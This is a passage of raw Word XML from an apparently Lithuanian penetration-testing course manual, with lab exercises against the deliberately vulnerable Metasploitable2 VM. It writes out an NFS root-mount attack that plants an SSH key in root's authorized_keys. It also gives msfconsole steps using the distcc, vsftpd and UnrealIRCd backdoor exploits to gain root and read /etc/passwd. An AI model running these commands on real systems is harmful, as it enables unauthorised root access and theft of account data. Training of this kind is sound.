        <w:t># showmount -e [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6B3955" w14:textId="1CA30A0F" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t># ssh-keygen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000D26E2" w14:textId="2E33014C" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t># mkdir /tmp/r00t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0641E2A3" w14:textId="0A4A728A" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># mount -t nfs </w:t>
      </w:r>
      <w:r w:rsidR="004A496A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP]:/ /tmp/r00t/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789B5D17" w14:textId="07CEE196" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t># cat ~/.ssh/id_rsa.pub &gt;&gt; /tmp/r00t/root/.ssh/authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACD12F0" w14:textId="45F89E4B" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t># umount /tmp/r00t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77935271" w14:textId="4BDEE544" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t># ssh root@[IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E963F1" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Komentaras: [IP] – testuojamos sistemos IP adresas pasiekiamas tinkle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23780CAB" w14:textId="2F2C1333" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="00AB1DA7" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51C530F4" w14:textId="65F98AA9"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1</w:t>
      </w:r>
      <w:r w:rsidR="42890CD5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PAŽEIDŽIAMUMŲ IŠNAUDOJIMAS NR.</w:t>
      </w:r>
      <w:r w:rsidR="42890CD5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="009A4143" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">ĮRANKIO „MSFCONSOLE“ </w:t>
      </w:r>
      <w:r w:rsidR="005E7A35" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PA</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>NAUDOJIMAS PRIVILEGIJUOTO VARTOTOJO TEISIŲ ĮGIJIMUI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4FE6DD" w14:textId="6928CC26" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Testuojama Sistema: Metasploitable2</w:t>
      </w:r>
      <w:r w:rsidR="009A4143" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>veikianti virtualiame kompiuteryje</w:t>
      </w:r>
      <w:r w:rsidR="009A4143" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472822B4" w14:textId="60E54F4D" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Sistema testavimui: </w:t>
      </w:r>
      <w:r w:rsidR="009A4143" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>irtualus arba fizinis kompiuteris su testavimui skirta operacine sistema. Įdiegtas ir paruoštas darbui įrankis „MSFCONSOLE“</w:t>
      </w:r>
      <w:r w:rsidR="009A4143" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D127296" w14:textId="7B31CE4B" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Užduotis. Panaud</w:t>
      </w:r>
      <w:r w:rsidR="008863B2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">odami </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>„msfconsole“</w:t>
      </w:r>
      <w:r w:rsidR="00F668AA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> įrankį</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00465A05" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>suraskite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pažeidžiamumus</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">išnaudojančias programas (angl. </w:t>
      </w:r>
      <w:r w:rsidR="00465A05" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit) protokolams: ftp, irc, distccd (toliau [name]) Darbo eiga:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DCAF7E" w14:textId="2F31B652" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t># msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE87B3E" w14:textId="61300CDF" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msf &gt; search [name]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222CE39C" w14:textId="65E63E60" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msf &gt; use &lt;..&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C51F01" w14:textId="311238E2" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit(distcc_exec) &gt; set RHOST [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F12A3E7" w14:textId="286A56BB" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit(distcc_exec) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03569CEF" w14:textId="06F1CC31" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">id (tikėtinas rezultatas: </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676B169D" w14:textId="769F7523" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cat /etc/passwd (jeigu suveikė komanda “id“)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443626F2" w14:textId="70F8F57B" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-Nukopijuokite ir išsaugokite failo „/etc/passwd“ turinį</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A0E4C8" w14:textId="148E1C0E" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Išimtas tekstas &lt;..&gt;:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C722DB1" w14:textId="50989C1C" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E75E4E" w14:textId="15E73EBE" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD3ADC2" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit/unix/misc/distcc_exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ED0EB3" w14:textId="3CABFB47" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="00AB1DA7" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="567C6268" w14:textId="43B55193" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Komentaras: [IP] – testuojamos sistemos IP adresas pasiekiamas tinkle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8D20E5" w14:textId="43B55193" w:rsidR="008D69EB" w:rsidRPr="005A5C28" w:rsidRDefault="008D69EB" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3187D17D" w14:textId="2E0D4141" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABFD2AD" w14:textId="43515809" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="1192F7E7" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Evans</w:t>
      </w:r>
      <w:r w:rsidR="001E2CAC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> C. (2011, </w:t>
      </w:r>
      <w:r w:rsidR="51227578" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>liepos</w:t>
      </w:r>
      <w:r w:rsidR="105D60C4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="51227578" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3). </w:t>
      </w:r>
      <w:r w:rsidR="48C632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Alert: vsftpd download backdoored. </w:t>
      </w:r>
